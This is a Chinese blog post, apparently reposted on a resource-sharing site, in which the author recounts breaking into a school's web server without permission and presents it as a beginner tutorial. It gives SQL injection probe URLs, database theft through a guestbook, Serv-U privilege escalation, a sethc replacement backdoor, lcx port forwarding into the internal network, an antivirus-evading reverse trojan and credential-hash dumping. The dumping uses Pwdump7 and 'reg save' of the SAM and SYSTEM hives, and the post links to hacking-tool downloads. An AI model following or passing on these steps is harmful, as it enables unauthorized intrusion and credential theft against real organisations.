也想出现在这里? 联系我们

入侵渗透进入某学校网站服务器

作者 : 小编 本文共2026个字,预计阅读时间需要6分钟 发布时间: 2021-06-15 共4.96K人阅读
也想出现在这里? 联系我们

在网上闲的蛋疼无聊百度搜索“蛋疼”二字看到一篇文章《蛋疼的中国黑客》虽然你的出发点是好的但是你侮辱了他们虽然我不是黑客但是我要消灭你…….

入侵渗透进入某网站服务器 - 叶湘笑 - 纯白色

比较详细适合新手大牛路过…

说做就做,日之

独立ip服务器没有挂其他站点

Ping ip返回值判断对方机器是W2003服务器

在收集一下端口开了21 135 139

ftp XXX返回

220 Serv-U FTP Server v6.4 for WinSock ready..

装了SEVER u

经搜集确定服务器为win2003+asp+iis6.0+mssql

打开目标3389没反应学校网站应该是放在内网

一、获取webshell

首先从网站的asp程序入手

http://www.xxxxx.com/news.asp?id=21&sc=1%20and%201=1(and注入1=1页面正常1=2页面错误有注入)

返回到了首页,再来

http://www.xxxxx.com/news.asp?id=21&sc=1%20or%201=1(or注入如果or1=1返回错误即有注入返回正确页面则无注入)

又返回到了首页看来这个网站的管理员还算有点安全知识

不死心继续观察利用搜索引擎载入到啊D扫扫site:xxxx.com asp?id=

http://www.xxxxx.com/show_news.asp?id=418’

随手一个单引号

入侵渗透进入某网站服务器 - 叶湘笑 - 纯白色

YES出现注入猜解猜解

激动的时候到了MD5 NOT FOUND暴力破解吧没兴趣

继续回到主站看到了一个留言板抱着试试的心态

入侵渗透进入某网站服务器 - 叶湘笑 - 纯白色

抓包提交后既然有数据库地址

Ok小失误成功得到地址

入侵渗透进入某网站服务器 - 叶湘笑 - 纯白色

Fckeditor漏洞也可以利用

这里就不做演示了

入侵渗透进入某网站服务器 - 叶湘笑 - 纯白色

二、服务器提权

扫描了下端口

本地打开21,1433,3389等端口,对外只开放了80端口

试着看下可写目录极品出来了

入侵渗透进入某网站服务器 - 叶湘笑 - 纯白色

这就好办了SU提权OK替换sethc成功加入管理

内网进不去那我们就把它转发出来用到lcx端口转发

使用Lcx进行内网端口转发图文讲解

入侵渗透进入某网站服务器 - 叶湘笑 - 纯白色

上传lcx.exe

设置好之后成功进入服务器

入侵渗透进入某网站服务器 - 叶湘笑 - 纯白色

在配置个马儿反弹成功上线这个马儿过内杀软全过瑞星就直接pass吧

入侵渗透进入某网站服务器 - 叶湘笑 - 纯白色

三、内网渗透

既然网站的安全这么差我就直接抓hash吧

使用Pwdump7提取系统密码hash值

工具临时下载地址:http://www.hackline.net/a/soft/cracking/2010/0412/3312.html

杀毒软件可能会报毒。请自行检测。

使用说明:

Pwdump7可以在CMD下提取出系统中的用户的密码hash (包括LM和NTLM),当然必须要有系统权限.提取出了HASH,再用ophcrack破出明文密码,对进一步渗透是有很大帮助的,经我测试,在XP下是可以成功提取出来的.这个工具需要一个DLL文件支持,压缩包中带的,只需放到一个文件夹中即可,用法很简单,直接输入

D:\\>PwDump7.exePwdump v7.1 – raw password extractorAuthor: Andres Tarasco Acunaurl: http://www.514.es

administrator:500:25FC25A0CA659E57ACEDB07452AB7A8E:6C1B3BE8D28CD3E7AB63122C8A572DDF:::guest:501:0E175C3EFF8EED1652440321FCD91E4E:2850991451071A5B7A95F2977D4AAEF0:::atarasco:1001:45C6AEEDC857A06DC595236F8F5FECAA:D0253497114C1B4CC337210F4580A716:::

用法:pwdump7.exe (Dump system passwords)pwdump7.exe -s <samfile> <systemfile> (Dump passwords from files)pwdump7.exe -d <filename> [destionation] (Copy filename to destionation)pwdump7.exe -h (Show this help)

-s 是从一个sam文件中提取hash,这个文件在%systemroot%\\config\\sam,这里.-d 是把一个文件复制到另一个位置,D:\\>PwDump7.exe -d c:\\pagefile.sys pagefile.dmp 从这个例子中可以看出,他的特别之处在于,可以把进程正在占用的文件复制成功. 解决提示libeay32.dll找不到或缺少的问题

  拷贝libeay32.dll到windows/system32下即可

在这里我给大家一个简单的方法老外抓hash的方法

reg save hklm\\system system

reg save hklm\\sam sam

入侵渗透进入某网站服务器 - 叶湘笑 - 纯白色

操作成功完成后自己就拿工具去破吧

感谢老大mr cool给我的工具

他的网站http://www.blackbap.org/

我这个内网主机只有两台而且没开3389

我就不继续渗透了

1. 本站所提供的源码模板(主题/插件)等资源仅供学习交流,若使用商业用途,请购买正版授权,否则产生的一切后果将由下载用户自行承担,有部分资源为网上收集或仿制而来,若模板侵犯了您的合法权益,请来信通知我们(Email: rayer@88.com),我们会及时删除,给您带来的不便,我们深表歉意!
2. 分享目的仅供大家学习和交流,请不要用于商业用途!
3. 如果你也有好源码或者教程,可以到用户中心发布投稿,分享有金币奖励和额外收入!
4. 本站提供的源码、模板、插件等等其他资源,都不包含技术服务 请大家谅解!
5. 如有链接无法下载、失效或广告,请联系站长,可领回失去的金币,并额外有奖!
6. 如遇到加密压缩包,默认解压密码为"www.zyfx8.cn",如遇到无法解压的请联系管理员!
本站部分文章、资源来自互联网,版权归原作者及网站所有,如果侵犯了您的权利,请及时联系我站删除。免责声明
资源分享吧 » 入侵渗透进入某学校网站服务器

常见问题FAQ

免费下载或者VIP会员专享资源能否直接商用?
本站所有资源版权均属于原作者所有,这里所提供资源均只能用于参考学习用,请勿直接商用。若由于商用引起版权纠纷,一切责任均由使用者承担。更多说明请参考 VIP介绍。
织梦模板使用说明
你下载的织梦模板并不包括DedeCMS使用授权,根据DedeCMS授权协议,除个人非盈利站点外,均需购买DedeCMS商业使用授权。购买地址: http://www.desdev.cn/service-dedecms.html

发表评论

Copyright 2015-2020 版权所有 资源分享吧 Rights Reserved. 蜀ICP备14022927号-1
开通VIP 享更多特权,建议使用QQ登录